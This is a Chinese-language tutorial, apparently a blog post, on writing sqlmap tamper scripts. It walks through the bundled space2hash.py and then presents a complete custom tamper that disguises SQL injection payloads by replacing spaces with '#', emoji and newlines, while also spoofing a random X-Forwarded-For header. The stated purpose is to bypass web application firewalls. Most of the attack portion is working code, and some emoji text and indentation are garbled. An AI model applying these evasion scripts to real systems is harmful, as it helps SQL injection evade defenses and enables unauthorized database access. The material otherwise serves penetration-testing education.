0x1Demo

一个基本的tamper结构

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW # 当前脚本调用优先等级


def dependencies(): # 声明当前脚本适用/不适用的范围，可以为空。
    pass

def tamper(payload, **kwargs): # 修改Payload、以及请求头的主要函数
"""tamper描述"""
    return payload

0x2结构分析

拿自带的tamper space2hash.py来分析一下

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import os
import random
import string

from lib.core.common import singleTimeWarnMessage
from lib.core.compat import xrange
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

def tamper(payload, **kwargs):
    """
    Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

    Requirement:
        * MySQL

    Tested against:
        * MySQL 4.0, 5.0

    Notes:
        * Useful to bypass several web application firewalls
        * Used during the ModSecurity SQL injection challenge,
          http://modsecurity.org/demo/challenge.html

    >>> random.seed(0)
    >>> tamper('1 AND 9227=9227')
    '1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227'
    """

    retVal = ""

    if payload:
        for i in xrange(len(payload)):
            if payload[i].isspace():
                randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
                retVal += "%%23%s%%0A" % randomStr
            elif payload[i] == '#' or payload[i:i + 3] == '-- ':
                retVal += payload[i:]
                break
            else:
                retVal += payload[i]

    return retVal

分为了import部分、__priority__ 属性、dependencies函数、tamper函数

2.1 import

import os
import random
import string

from lib.core.common import singleTimeWarnMessage
from lib.core.compat import xrange
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY

这一部分我们可以导入sqlmap的内部库,也可以导入python的库，sqlmap为我们提供了很多封装好的函数和数据类型，比如下面这个base64编码函数

from lib.core.convert import encodeBase64

就来自sqlmap\lib\core\convert.py

2.2 PRIORITY

__priority__ = PRIORITY.LOW

PRIORITY是定义tamper的优先级，PRIORITY有以下几个参数，来源于sqlmap/lib/core/enums.py

LOWEST = -100
LOWER = -50
LOW = -10
NORMAL = 0
HIGH = 10
HIGHER = 50
HIGHEST = 100

如果使用了多个tamper，sqlmap就会根据每个tamper定义PRIORITY的参数等级来优先使用等级较高的tamper

2.3dependencies

def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

dependencies主要是提示用户，这个tamper支持哪些数据库，测试代码如下:

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY
from lib.core.enums import DBMS

__priority__ = PRIORITY.NORMAL

def dependencies():
    singleTimeWarnMessage("这是我的提示内容!!!!!!!!!!!!!!!!!!!")

def tamper(payload, **kwargs):
    return payload

运行效果如下

至于DBMS.MYSQL就是代表代表的是Mysql在sqlmap\lib\core\enums.py可以查看其他的数据库

2.4Tamper

tamper这个函数是tamper最重要的函数，你要实现的功能，全部写在这个函数里。payload这个参数就是sqlmap的原始注入payload，我们要实现绕过，一般就是针对这个payload的修改。kwargs是针对http头部的修改，如果你bypass，是通过修改http头，就需要用到这个

2.4.1基于payload

这里就以emoji绕过为例来写一个tamper，用随机emoji表情加注释换行来代替空格

def tamper(payload, **kwargs):
retVal = ""
if payload:
    for i in xrange(len(payload)):
        if payload[i].isspace():
            emoji = '????????‍♂️?‍♀️??????????♓️?⚛️?☑️?????⚽️??⚾️??????????'
            retVal += "%%23%s%%0A" % emoji
        elif payload[i] == '#' or payload[i:i + 3] == '-- ':
            retVal += payload[i:]
            break
        else:
            retVal += payload[i]
return retVal

2.4.2基于HTTP头

然后想为我们刚刚实现的那个脚本加一个随机xff头,这里我们将xforwardedfor.py这个自带的tamper的代码拷贝过来
一个生成随机ip的函数

def randomIP():
"""Return random IP"""
octets = []
while not octets or octets[0] in (10, 172, 192):
    octets = random.sample(xrange(1, 255), 4)
return '.'.join(str(_) for _ in octets)

然后在tamper调用这个函数,修改我们的X-Forwarded-For的值

def tamper(payload, **kwargs):
headers = kwargs.get("headers", {})
headers["X-Forwarded-For"] = randomIP()

0x03.完整脚本

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import os
import random

from lib.core.common import singleTimeWarnMessage
from lib.core.compat import xrange
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

def randomIP():
    """Return random IP"""
    octets = []
    while not octets or octets[0] in (10, 172, 192):
        octets = random.sample(xrange(1, 255), 4)
    return '.'.join(str(_) for _ in octets)

def tamper(payload, **kwargs):
    """
    Random XFF and character ('#') followed by emoji and newline ('\n') replace (MySQL) space character

    Requirement:
        * MySQL

    Tested against:
        * MySQL

    Source:
        http://blog.mo60.cn/

    """
    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = randomIP()
    retVal = ""
    if payload:
        for i in xrange(len(payload)):
            if payload[i].isspace():
                emoji = '????????‍♂️?‍♀️??????????♓️?⚛️?☑️?????⚽️??⚾️??????????'
                retVal += "%%23%s%%0A" % emoji
            elif payload[i] == '#' or payload[i:i + 3] == '-- ':
                retVal += payload[i:]
                break
            else:
                retVal += payload[i]
    return retVal

运行截图数据包

0x04 参考

https://y4er.com/post/sqlmap-tamper/